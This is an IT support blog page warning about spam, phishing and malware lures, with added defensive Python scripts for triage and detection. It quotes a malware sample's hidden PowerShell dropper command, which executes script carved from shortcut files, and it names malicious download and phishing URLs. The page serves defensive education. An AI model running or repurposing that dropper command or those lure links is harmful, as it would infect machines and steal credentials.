sircles.net Computer Support The sircles IT support & solutions blog | Viruses and Malware threats


Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent


This email has been spotted this week:

From: lou_weihe@clarityconfidenceandcash.com
Sent: Monday, July 30, 2018 10:52 PM
To: Recipient
Subject: Your, Name Pack(4M0A_8141) confirmed: 5 items sent

 

Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.

 

WOMEN

MEN

ACCESSORIES

HOME DECOR

GADGETS


Hi Your Name,

Great news! Your order is now confirmed. We will email you again when your items ship.

Thanks for shopping with us!

Order ID: 4M0A_8141

Shipping Address:

Your Name
Your Phone Your Postcode 

View Order


This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us 

The link in the message downloads a file: 4M0A_8141-order-Receipt.zip

Genuine order confirmations are not delivered as zip files. The download is hosted on https://johanwolf.com, a site with a valid TLS certificate that is evidently being misused by someone (its front page just redirects to Office 365 support for some reason). A valid certificate only proves that whoever set up the site controls that domain name; it says nothing about whether the content is safe.
 
Unzipping the file yields an image, presumably a logo meant to make the package look like it came from a real company, and a second file that launches this command (the search for *.lnk below indicates it is a Windows shortcut whose target is the command line):
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
 
This is a shortcut-as-dropper technique. Read step by step: powershell.exe is started with abbreviated, mixed-case switches (-nop is -NoProfile, -win hidDEN is -WindowStyle Hidden, -comman is -Command; PowerShell accepts abbreviated switch names and ignores case, which also defeats naive string matching on '-ExecutionPolicy Bypass'). The script changes to the Documents folder, then uses findstr /s to search every .lnk file under the parent folder (the user profile, which covers Desktop and Downloads, wherever the zip was extracted) for lines containing the marker string bremodilu, writes those lines to file.ps1 and runs it. In other words the real payload is PowerShell text appended to the shortcut file itself after the marker; nothing further needs to be downloaded. Looking at this we are not sure it would work, but we might try it on an old PC.
 
We will let you know.
 
Report the sender and the website, and stay vigilant!
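As an added example (this is not code from the post, and not from the spammers), here is a small Python triage script that does two things a defender needs for this sample: it expands the abbreviated, mixed-case powershell.exe switches into their full names so that a rule such as '-ExecutionPolicy Bypass' matches however the attacker spelled it, and it carves the script text out of a shortcut file the way the findstr command does. The switch table follows Microsoft's documentation for Windows PowerShell 5.1, the marker bremodilu is the one from the sample, and the command lines and shortcut bytes are constructed here for the demonstration.

```python
"""Added example (not code from the sircles post): normalise an abbreviated,
mixed-case powershell.exe command line so detection rules can match it, and
carve the script text that a shortcut (.lnk) carries after a marker, which
is what the quoted findstr pipeline does.

Assumptions: the switch table follows Microsoft's about_PowerShell_exe
documentation for Windows PowerShell 5.1 (full name, shortest accepted
abbreviation); the sample command lines and .lnk bytes are constructed.
"""
import re

# (full switch name, shortest documented abbreviation), checked in order.
# powershell.exe accepts any prefix of the full name at least as long as the
# abbreviation, case-insensitively, so "-win" is "-WindowStyle".
SWITCHES = [
    ("noprofile", "nop"), ("nologo", "nol"), ("noexit", "noe"),
    ("noninteractive", "noni"), ("encodedcommand", "e"),
    ("executionpolicy", "ex"), ("windowstyle", "w"), ("command", "c"),
    ("configurationname", "config"), ("file", "f"), ("inputformat", "inp"),
    ("outputformat", "o"), ("psconsolefile", "psc"), ("sta", "sta"),
    ("mta", "mta"), ("version", "v"), ("help", "?"),
]
# Documented short forms that are not prefixes of the full name.
ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand",
           "if": "inputformat", "of": "outputformat"}


def resolve_switch(token):
    """Map a switch as typed (without the leading - or /) to its full name."""
    key = token.lower()
    if key in ALIASES:
        return ALIASES[key]
    for full, shortest in SWITCHES:
        if full.startswith(key) and len(key) >= len(shortest):
            return full
    return None


def normalize(cmdline):
    """Expand switch abbreviations and lower-case everything else."""
    tokens = cmdline.split()
    out = []
    for i, tok in enumerate(tokens):
        full = resolve_switch(tok[1:]) if tok[:1] in "-/" and len(tok) > 1 else None
        if full is None:
            out.append(tok.lower())
            continue
        out.append("-" + full)
        if full in ("command", "encodedcommand"):
            # Everything after -Command / -EncodedCommand is the script itself.
            out.append(" ".join(tokens[i + 1:]).lower())
            break
    return " ".join(out)


# Rules are written against the normalised form, so they do not care how the
# switches were abbreviated or capitalised on the wire.
RULES = {
    "hidden_window": re.compile(r"-windowstyle hidden"),
    "policy_bypass": re.compile(r"-executionpolicy (bypass|unrestricted)"),
    "no_profile": re.compile(r"-noprofile"),
    "script_carved_from_lnk": re.compile(r"findstr .*\.lnk.*>\s*\S+\.ps1"),
}


def match_rules(cmdline):
    norm = normalize(cmdline)
    return sorted(name for name, rx in RULES.items() if rx.search(norm))


def carve_marked_lines(lnk_bytes, marker):
    """Return the lines of a shortcut file that contain the marker, which is
    what `findstr <marker> file.lnk` prints. The binary shortcut header never
    contains the marker, so only the appended script text comes back."""
    return [line.decode("latin-1").rstrip("\r")
            for line in lnk_bytes.split(b"\n") if marker in line]


def triage(command_lines):
    """Return {command line: [rule names]} for every line that fires a rule."""
    results = {}
    for cmd in command_lines:
        hits = match_rules(cmd)
        if hits:
            results[cmd] = hits
    return results


# Constructed sample: the command line quoted above plus two benign ones, as
# Sysmon event 1 or an EDR would record them.
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop "
    r"-executionpolicy bypass -win hidDEN  -comman cd %USERPROFILE%\Documents; "
    r"findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit",
    r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1",
    r"powershell.exe -Command Get-Date",
]

# Constructed sample shortcut: the real ShellLinkHeader magic (size 0x4C and
# the shell link CLSID) followed by filler, then a script line appended after
# the marker. Real samples carry the whole PowerShell payload this way.
SAMPLE_LNK = (
    b"L\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F"
    + b"\x00" * 32 + b"\r\n"
    + b"bremodilu;Start-Process notepad.exe\r\n"
)

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_COMMAND_LINES).items():
        print(hits, "<-", normalize(cmd)[:80])
    print(carve_marked_lines(SAMPLE_LNK, b"bremodilu"))
```

In practice you would feed the CommandLine field from Sysmon event 1 or your EDR into triage(). The point is to match the canonical form rather than the bytes on the wire. The lone no_profile hit on the benign backup line shows why a single rule is a weak signal; the combination of hidden window, policy bypass and a script carved out of a shortcut is what is worth alerting on.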
 
 

About a internship! Fake Resume or CV SPAM!

 

Microsoft Office documents are a common carrier for macro malware. Recent versions of Office open email attachments in Protected View with macros disabled in order to protect the user, so the modern malicious document carries a decoy front page that tries to talk you into 'unlocking' it, that is, clicking Enable Editing and then Enable Content.

Let's have a quick look at one:

Here is a message containing a resume we have received today...

Hello there! I hope you are well!

I am absolutely interested in a internship.
Find my attached resume and reply ASAP.

The password for the file is 123123

Looking forward to hearing back from you!
Dayna

If we double-click the attachment containing 'Danya's Resume' we see the password request in Microsoft Word 2016.

We enter the password provided and then...


The text in the document pane has actually been added by the spammers. That 'was this information helpful?' panel is just an image copied from the Microsoft website, just as we have captured this image from the spammers. The 'Yes' and 'No' buttons are not live; they are there to persuade you that this is a Microsoft message. The text is there to persuade you to enable the macros in this document. Do not.

The only genuine Microsoft advice here is the yellow bar at the top, where you are told 'Be careful - email attachments can contain viruses. Unless you need to edit, it's safer to stay in protected view.' That is correct: Protected View opens the file read-only in a sandbox and macros cannot run until you leave it. The password is itself a warning sign: a password-protected attachment cannot be inspected by the mail gateway, which is exactly why the password is handed to you in the email body. We would suggest that unless you are expecting the document, and it is from the person you expect it to be from, you never enable a Microsoft document for editing.

Let us make sure that this document is not one we are expecting. If we click the File menu in Microsoft Word and select Info we can see the document properties:


As we can see from the details, this document is nonsense and is not from anyone we know or want to know.

Label these as spam and report the originator to your email administrator or provider.

We have seen the following alternate subjects for the same email:

  1. About a career?
  2. Concerning a internship.
  3. Regarding a career!
  4. Regarding a job?
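As an added example (not code from this post), the Python below triages a Word attachment without opening it in Word: it tells an OOXML package (.docx/.docm, which is a zip) from an OLE compound file (a legacy .doc, or a password-protected .docx, which Office stores as an encrypted OLE container), and for a package it checks whether a VBA project is present. The sample files are built in memory; the encrypted sample is a stub that carries only the stream name the check looks for, and the verdict strings are ours.

```python
"""Added example (not code from the sircles post): triage an Office
attachment without opening it in Word, using only the standard library.

An OOXML file (.docx/.docm) is a zip; a macro project lives in it as
vbaProject.bin with the vbaProject content type. A legacy .doc, and any
password-protected OOXML file, is an OLE compound file instead; Office
stores the encrypted package in streams named EncryptionInfo and
EncryptedPackage. The sample files below are constructed in memory; the
encrypted one is a stub that only carries the stream name.
"""
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ZIP_MAGIC = b"PK\x03\x04"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
# OLE directory entries store stream names as UTF-16LE.
ENCRYPTED_PACKAGE_STREAM = "EncryptedPackage".encode("utf-16-le")
MACRO_FREE_EXTENSIONS = {".docx", ".xlsx", ".pptx"}


def container_type(data):
    if data.startswith(OLE_MAGIC):
        return "ole"
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    return "other"


def ooxml_has_vba(data):
    """True if the package ships a VBA project, by part name or content type."""
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        names = pkg.namelist()
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            return True
        if "[Content_Types].xml" in names:
            types = pkg.read("[Content_Types].xml").decode("utf-8", "replace")
            return VBA_CONTENT_TYPE in types
    return False


def ole_is_encrypted_package(data):
    """Heuristic: an encrypted OOXML file names its EncryptedPackage stream
    in the OLE directory; a plain legacy .doc does not."""
    return ENCRYPTED_PACKAGE_STREAM in data


def triage(filename, data):
    """Classify an attachment. The verdict strings are this example's own."""
    ext = filename[filename.rfind("."):].lower() if "." in filename else ""
    kind = container_type(data)
    if kind == "ole":
        return "encrypted-office" if ole_is_encrypted_package(data) else "legacy-ole"
    if kind == "ooxml":
        if ooxml_has_vba(data):
            # A .docx must not carry VBA; a .docm may. Either way it has macros.
            if ext in MACRO_FREE_EXTENSIONS:
                return "macro-enabled-mismatched-ext"
            return "macro-enabled"
        return "ooxml-no-macros"
    return "not-office"


def build_ooxml(with_vba):
    """Constructed minimal Word package, with or without a VBA project part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        types = ('<?xml version="1.0" encoding="UTF-8"?>'
                 '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                 '<Default Extension="xml" ContentType="application/xml"/>')
        if with_vba:
            types += ('<Override PartName="/word/vbaProject.bin" '
                      'ContentType="%s"/>' % VBA_CONTENT_TYPE)
        types += "</Types>"
        pkg.writestr("[Content_Types].xml", types)
        pkg.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            pkg.writestr("word/vbaProject.bin", OLE_MAGIC + b" stub VBA project")
    return buf.getvalue()


def build_encrypted_stub():
    """Constructed stand-in for a password-protected OOXML file: the OLE magic
    plus a directory fragment naming the EncryptedPackage stream."""
    return OLE_MAGIC + b"\x00" * 504 + ENCRYPTED_PACKAGE_STREAM + b"\x00" * 32


SAMPLES = {
    "Dayna Resume.docm": build_ooxml(True),
    "resume.docx": build_ooxml(False),
    "Resume-protected.docx": build_encrypted_stub(),
    "notes.txt": b"plain text",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:24s} {triage(name, data)}")
```

The 'encrypted-office' verdict is the one that matters for this post: a gateway that cannot see inside the file has to decide on the wrapper alone, and a password that arrives in the same email as the attachment is a strong reason to quarantine rather than deliver.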

Mac Detox Software - is it a good thing?

22. May 2018 13:09 by sirclesadmin in Viruses and Malware threats

 

If you are a Mac user you will find your computer slowing down just like anyone else's. There is a finite amount of processing power, RAM and disk throughput, and the software you run will eventually max it out.

The Mac has no Windows-style registry that the system must consult to know what to run at start-up, so removing unwanted start-up programs is straightforward: login items are listed under System Preferences > Users & Groups > Login Items, and background items are plain property-list files in the LaunchAgents and LaunchDaemons folders.

There is a great article on what to do here: https://www.macworld.com/article/2047747/take-control-of-startup-and-login-items.html

Mac detox software, even when it is free, comes at a cost, whether that is corrupting your browser search results or just recording your activity. You do not need proprietary software to clean a Mac.

We have been seeing a lot of spam on the sircles blog recently trying to add forwards and links to various Mac clean-up sites, and we do not recommend using any of them. Stick to trusted sites for information, such as MacWorld, and keep your Mac clear of software that may cause more problems than a slow computer.
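As an added example (not code from this post), the Python below reads the launchd property lists that drive start-up items directly: listing what will run at login, and where each executable lives, takes a few lines and no third-party 'detox' tool. The sample plists are written to a temporary folder so the script runs anywhere; point scan() at LAUNCHD_DIRS on a Mac to read the real ones. The 'suspicious' heuristic (an item that starts itself from a user-writable location) is ours.

```python
"""Added example (not code from the sircles post): list what macOS will start
at login or boot by reading launchd property lists directly, which is the
information a "detox" tool sells back to you. Standard library only; the
sample plists are constructed in a temporary directory so it runs anywhere.

Assumptions: the folders scanned are the standard launchd locations; the
"suspicious" heuristic (starts itself, from outside the system, Apple or
Applications folders) is this example's own and will need tuning.
"""
import os
import plistlib
import tempfile

LAUNCHD_DIRS = [
    os.path.expanduser("~/Library/LaunchAgents"),   # per-user agents
    "/Library/LaunchAgents",                         # all-user agents
    "/Library/LaunchDaemons",                        # system daemons (root)
]
# Paths Apple and well-behaved installers use; anything else is worth a look.
EXPECTED_PREFIXES = ("/System/", "/usr/", "/Applications/", "/Library/Apple/")


def program_of(plist):
    """The executable an item launches, from Program or ProgramArguments."""
    if plist.get("Program"):
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else None


def summarize(path, data):
    """Reduce one launchd plist to the fields needed to decide keep or remove."""
    plist = plistlib.loads(data)
    program = program_of(plist)
    starts_itself = bool(plist.get("RunAtLoad")) or bool(plist.get("KeepAlive"))
    suspicious = bool(program) and starts_itself and not program.startswith(EXPECTED_PREFIXES)
    return {
        "file": path,
        "label": plist.get("Label"),
        "program": program,
        "run_at_load": bool(plist.get("RunAtLoad")),
        "keep_alive": bool(plist.get("KeepAlive")),
        "suspicious": suspicious,
    }


def scan(dirs):
    """Summarise every .plist in the given folders; missing folders are skipped."""
    items = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if name.endswith(".plist"):
                full = os.path.join(d, name)
                with open(full, "rb") as fh:
                    items.append(summarize(full, fh.read()))
    return items


# Constructed samples: a persistence item of the kind unwanted "cleaner"
# software drops, and a harmless one living under /Applications.
SAMPLE_PLISTS = {
    "com.example.cleaner.plist": {
        "Label": "com.example.cleaner",
        "ProgramArguments": ["/Users/demo/Library/Application Support/.cleaner/helper", "--daemon"],
        "RunAtLoad": True,
        "KeepAlive": True,
    },
    "com.example.backup.plist": {
        "Label": "com.example.backup",
        "Program": "/Applications/Backup.app/Contents/MacOS/backup",
        "RunAtLoad": True,
    },
}


def demo_scan():
    """Write the constructed plists to a temp folder and scan that folder."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, content in SAMPLE_PLISTS.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                plistlib.dump(content, fh)
        return scan([tmp])


if __name__ == "__main__":
    # On a Mac, replace demo_scan() with scan(LAUNCHD_DIRS) to see the real list.
    for item in demo_scan():
        flag = "!! " if item["suspicious"] else "   "
        print(flag + str(item["label"]), "->", item["program"])
```

Removing an unwanted item is then a matter of unloading it (launchctl unload on the plist) and deleting the file and the program it points at; the script tells you exactly which two paths those are.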

Natwest Spam: Incomplete Security Information


 

You may receive the following message, purporting to be from Natwest:

 

From: NatWest <info@ipconnect.de>
Sent: Date
To: Recipient
Subject: Incomplete Security Information


Incomplete Security Information


Hello,


Information we use to determine the security of your account is missing we need you to confirm as soon as possible.

 

Details:
You are required to review and update missing information*

We have temporarily suspended your online access to prevent any loss to your balance until you securely submit missing information: Click below to continue

RESTORE MY ACCOUNT

 

 

Thank You,
The NatWest Accounts team

 

*The location is approximate and determined by the IP address it was coming from.

This email can't receive replies. For more information, visit the NatWest Accounts Help Center.


You received this mandatory email service announcement to update you about important changes to your NatWest product or account.

© 2018 NatWest Inc.,

The link in the message tries to take you to: http://www.betonruettler.at/statistik/nwolb/index.php. Note the give-aways: the sender address is on ipconnect.de, nothing to do with NatWest; the link goes to an unrelated .at domain, and only the 'nwolb' folder name borrows from nwolb.com, NatWest's real online banking address; and the page is served over plain http.
 
Please mark it as spam. The phishing page appears to have already been taken down and the bad content removed from the site.

Disability Action Alliance - DAA Receipt#



From: invoice@culqi.net on behalf of Disability Action Alliance – DAA <invoice@culqi.net>
Sent: Date
To: Recipient
Subject: Receipt # 8453985 / Receipt # 9599113


Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

Your payment has been received, please find attached your PDF invoice.

   

Spam: Receipt # 255247


 

Beware of these fake receipts:

Payment Receipt

YOUR PAYMENT HAS BEEN PROCESSED

We send  Google.Docs document.

Link points to: https://www.ethereumpower.io/itr_inv_doc.zip

The link serves a zip file, itr_inv_doc.zip, in place of the promised Google Docs document: an archive from a domain that has nothing to do with Google is the delivery vehicle for whatever malware the sender wants on your computer.

We have reported the link and the website hosting it, and marked the email as spam. Please do the same if you receive one of these.


Spam Warning: Shipment status changed for parcel #1188!

24. January 2018 16:12 by sirclesadmin in Viruses and Malware threats, SPAM

 

You may receive the following:

Subject: Shipment status changed for parcel #1188!

A parcel was sent to you on 19/01/2018 via U.S. Postal Service Economy.

The following optional services were used:  Shipment status via email

You can view the tracking number and the delivery information on the tracking invoice enclosed below :

http://www.usps.com/shipping/trackandconfirm.htm ?action=download&trk_id=4209676728001104401363764606  

Thank you for shipping with USPS

******************************************************** ***************
NOTE:
 This e-mail was generated by USPS (www.usps.com)
 at the sender's request. 

Please contact 
 the sender of this e-mail or the U.S. Postal Service if you have 
 questions about the package delivery.

If you receive this message then it IS SPAM. Although the link text reads like a usps.com tracking address, clicking it leads to a file download that can harm your computer.

Following this being published, the file appears to have been removed.

Purchase Order No_18081994 - Fake Invoice PDFs with Spam URL Links


We have seen some fake purchase order emails today that have been modified to get around our latest advice on receiving bills by email. PDF is the usual, preferred format for invoices, but a PDF can also carry links to hazardous material, so to clear up any confusion:

Do not open links from questionable senders in any format!


From: De la Rosa, Samuel <samuel.delarosa@swissport.com>
Sent: 30 August 2017 00:57
Subject: Purchase Order No_18081994
Attachments: Purchase Order No_18081994.pdf


Dear Sir/Madam,

We are pleased to place an order with you which you will find attached.Please confirm the receipt of this order by email and let us have your order acknowledgement.
Do not hesitate to contact us if there are any questions regarding this order.

Best regards,

De La Rosa,Samuel
Customer & Technical Service

 

The email contains a PDF:


Now the PDF includes a link to an external page:


There is no legitimate reason to put this link inside a PDF; it is there so that the link does not appear in the email body, where filters would see it. If you click the link on a Windows PC using IE you receive a security warning about the connection to the site, with a tick box to remember your choice and a Block button:

First, remove the tick from that box so the decision is not remembered: never permanently trust links from any document!

A PDF link can be as dangerous as any other link!!!

 

Now, do we recognise this domain? http://roarr.org is a .org domain in this case, but a respectable-looking top-level domain proves nothing. Unless you recognise the domain, click BLOCK and send the email to Junk.

If you decide to open this particular link, you will receive:


This has been reported to Microsoft as a dangerous domain - DO NOT OPEN!!!

 

If we continue, against all advice, we can see that it is an impersonation of DocuSign:


Always check the domain in the address bar at the top against what the page claims to be: a real DocuSign sign-in lives on docusign.com, not on an unrelated domain. This is a credential-harvesting page after your email address and password. CLOSE THIS PAGE AND DELETE THE EMAIL!!
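As an added example serving both the NatWest message earlier on this page and this PDF, here is Python (not code from the sircles posts) that extracts the links from an HTML email and from the /URI link actions in a PDF, then applies the checks these posts make by eye: sender name versus sender domain, a brand named in the link text or path versus the domain the link really lands on, plain http, and links straight to an archive. The message and the PDF are constructed from the details quoted in the posts (the NatWest sender and betonruettler.at path, the roarr.org link); the brand-to-domain table is our assumption, not an authoritative list.

```python
"""Added example (not code from the sircles posts): extract the links from
an HTML email and from a PDF's /URI link actions, then apply the checks
these posts make by eye. Standard library only. The message, the PDF and
the brand table are constructed from the details quoted in the posts; the
brand-to-domain list is an assumption, not an authoritative source.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# brand -> (keywords that invoke it, domains it legitimately uses)  [assumed]
BRANDS = {
    "natwest": (("natwest", "nwolb"), {"natwest.com", "nwolb.com"}),
    "docusign": (("docusign",), {"docusign.com", "docusign.net"}),
    "usps": (("usps",), {"usps.com"}),
    "googledocs": (("google",), {"google.com"}),
}
DOWNLOAD_EXTENSIONS = (".zip", ".exe", ".js", ".vbs", ".scr", ".iso")


def registrable(host):
    """Crude eTLD+1: the last two labels, or three under two-part ccTLDs (.co.uk)."""
    parts = host.lower().split(".")
    if len(parts) >= 3 and parts[-2] in ("co", "org", "ac", "gov", "com") and len(parts[-1]) == 2:
        return ".".join(parts[-3:])
    return ".".join(parts[-2:])


def brands_invoked(*texts):
    """Which brands are named anywhere in the given strings."""
    blob = " ".join(t for t in texts if t).lower()
    return {b for b, (keywords, _) in BRANDS.items() if any(k in blob for k in keywords)}


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def links_from_email(raw):
    """Return (sender display name, sender address, [(href, link text), ...])."""
    msg = message_from_string(raw)
    name, addr = parseaddr(msg["From"])
    collector = LinkCollector()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "utf-8"
            collector.feed(part.get_payload(decode=True).decode(charset, "replace"))
    return name, addr, collector.links


def links_from_pdf(pdf_bytes):
    """Targets of /URI link actions in a PDF whose objects are not compressed or encrypted."""
    return [m.group(1).decode("latin-1") for m in re.finditer(rb"/URI\s*\(([^)]*)\)", pdf_bytes)]


def assess_sender(name, addr):
    """A display name claiming a brand that the sender's domain does not belong to."""
    host = registrable(addr.rsplit("@", 1)[-1])
    return [f"sender-claims-{b}-from-{host}" for b in sorted(brands_invoked(name))
            if host not in BRANDS[b][1]]


def assess_link(href, text=""):
    """Findings for one link: plain http, a brand lure on a foreign domain, a direct download."""
    url = urlparse(href)
    host = registrable(url.hostname or "")
    findings = ["plain-http"] if url.scheme == "http" else []
    for brand in sorted(brands_invoked(text, url.path, url.hostname or "")):
        if host not in BRANDS[brand][1]:
            findings.append(f"{brand}-lure-on-{host}")
    if url.path.lower().endswith(DOWNLOAD_EXTENSIONS):
        findings.append("direct-download")
    return findings


# Constructed from the NatWest message quoted above (only sender and link matter here).
SAMPLE_EMAIL = (
    "From: NatWest <info@ipconnect.de>\n"
    "To: recipient@example.com\n"
    "Subject: Incomplete Security Information\n"
    "Content-Type: text/html; charset=utf-8\n"
    "\n"
    "<html><body><p>Incomplete Security Information</p>\n"
    '<a href="http://www.betonruettler.at/statistik/nwolb/index.php">RESTORE MY ACCOUNT</a>\n'
    "</body></html>\n"
)
# Constructed minimal PDF with one link annotation to the domain seen in the purchase-order PDF.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Annot /Subtype /Link /Rect [72 700 300 720] "
    b"/A << /S /URI /URI (http://roarr.org/) >> >> endobj\n"
    b"%%EOF\n"
)

if __name__ == "__main__":
    name, addr, links = links_from_email(SAMPLE_EMAIL)
    print("sender:", assess_sender(name, addr))
    for href, text in links:
        print(href, "->", assess_link(href, text))
    for href in links_from_pdf(SAMPLE_PDF):
        print(href, "->", assess_link(href))
```

The PDF case shows the limit of automated checking: with no link text and no brand in the path, all the script can say about http://roarr.org/ is that it is plain http to a domain you have no business with, which is exactly the point at which a person has to decide to click Block. Real PDFs usually hold their objects in compressed streams, so a production version would inflate them first.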

 

Phone number email spams

24. August 2017 10:46 by sirclesadmin in Viruses and Malware threats, SPAM

Watch out for these emails trying to get you to phone an expensive number:

Name : Sophie Morgan

Email : morgan.sophie@writeme.com

Tel: 8712771062

Message : Please call me on +44 8712771062

If you email the address above you receive:

Subject: Auto-Reply

Hi, unfortunately I am unable to reply to your e-mail at the moment.

Please call me on +44 8714340521 Kind regards Sophie Morgan

The number is a premium-rate line: UK 0871 numbers carry a service charge and the owner of the number receives a share of it, so every call puts a few pence in the spammer's pocket. DO NOT CALL THIS NUMBER!!!

 

The postal address (Wye St, London SW11 2HB, UK) and email (jessica.mitchell@post.com) now seem to be prevalent with this spam submission. The change is simply to avoid spam filtering, but the phone number is not so easily changed, as it is a custom-registered number that sends them money. Our advice is to filter on the phone number, with and without +44.

One of the most annoying issues with this is that the numbers cannot easily be identified, nor their owners tracked down and held responsible: reverse look-up on these numbers relies on the number having been published in the first place, and there is no publicly available register as there is for domain names (although WHOIS records are largely suppressed now, wrongly in our opinion), so there is little immediate action that can be taken.

The latest versions of these emails are now appearing as:

 

Name :  Nisha

Email :  nisha@matridtech.net

Tel:  +1-855-370-5507

Message :   May I Have the privilege of Connecting with you?

As you can see, the numbers in this latest example are North American. +1 855 is a toll-free prefix, so the money is not made on the call charge this time; the aim is simply to get you talking to them.
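As an added example (not code from this post), the Python below does the filtering the post recommends: it normalises every phone number in a submission to international form, so that one blocklist entry covers 8712771062, +44 8712771062 and 0871 277 1062 alike, and it flags UK premium-rate prefixes whether or not they are on the list. The sample submissions are built from the numbers quoted above; the prefix tables and the blocklist are ours.

```python
"""Added example (not code from the sircles post): normalise every phone
number found in a message to +<country code><number> so that one blocklist
entry catches all the spellings the spammer uses, and flag premium-rate
prefixes regardless of the list. Standard library only; the sample
messages are constructed from the numbers quoted in the post, and the
prefix tables and blocklist are this example's own.
"""
import re

# Candidate numbers: optional +, then 9 to 20 characters of digits with
# spaces, dashes, dots or brackets between them, not glued to other text.
PHONE_RE = re.compile(r"(?<![\w+])\+?\(?\d[\d\s().-]{7,18}\d(?!\w)")

# UK premium / revenue-share prefixes in international form (assumed: 087x, 09x).
UK_PREMIUM_PREFIXES = ("+4487", "+449")
# North American 8xx numbers are toll-free for the caller.
NANP_TOLL_FREE = ("+1800", "+1833", "+1844", "+1855", "+1866", "+1877", "+1888")


def to_e164(raw, default_cc="44"):
    """Reduce one spelling of a number to +<cc><national number>."""
    digits = re.sub(r"\D", "", raw)
    if raw.strip().startswith("+"):
        return "+" + digits
    if digits.startswith("00"):          # international dialling prefix
        return "+" + digits[2:]
    if digits.startswith("0"):           # national trunk prefix
        return "+" + default_cc + digits[1:]
    if default_cc == "44" and len(digits) == 10:
        return "+44" + digits             # "8712771062": UK number written without the 0
    return "+" + digits


def numbers_in(text, default_cc="44"):
    """All numbers in a message, normalised and de-duplicated, in order of appearance."""
    seen = []
    for m in PHONE_RE.finditer(text):
        n = to_e164(m.group(0), default_cc)
        if n not in seen:
            seen.append(n)
    return seen


def classify(number):
    if number.startswith(UK_PREMIUM_PREFIXES):
        return "uk-premium-rate"
    if number.startswith(NANP_TOLL_FREE):
        return "nanp-toll-free"
    return "ordinary"


def filter_message(text, blocklist, default_cc="44"):
    """Return (decision, matched numbers). Blocklist entries may be written any way."""
    blocked = {to_e164(b, default_cc) for b in blocklist}
    found = numbers_in(text, default_cc)
    hits = [n for n in found if n in blocked or classify(n) == "uk-premium-rate"]
    return ("block" if hits else "allow"), hits


# Constructed from the submissions quoted in the post, plus one legitimate enquiry.
SAMPLE_MESSAGES = [
    "Name: Sophie Morgan\nEmail: morgan.sophie@writeme.com\nTel: 8712771062\n"
    "Message: Please call me on +44 8712771062",
    "Hi, unfortunately I am unable to reply to your e-mail at the moment.\n"
    "Please call me on +44 8714340521 Kind regards Sophie Morgan",
    "Name: Nisha\nEmail: nisha@matridtech.net\nTel: +1-855-370-5507\n"
    "Message: May I Have the privilege of Connecting with you?",
    "Name: Jo\nTel: 020 7946 0000\nMessage: Quote for 12 laptops please",
]
BLOCKLIST = ["+44 8712771062", "08714340521", "+1-855-370-5507"]

if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        decision, hits = filter_message(msg, BLOCKLIST)
        print(decision, hits, [classify(n) for n in hits])
```

The toll-free +1 855 number is only caught because it is on the list; the premium-rate rule catches the UK numbers even when the spammer registers a fresh one, which is the cheaper of the two defences to maintain.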

 

If you have any questions regarding spam or require any assistance, you can use the messenger icon at the bottom of the screen or contact us at https://www.sircles.net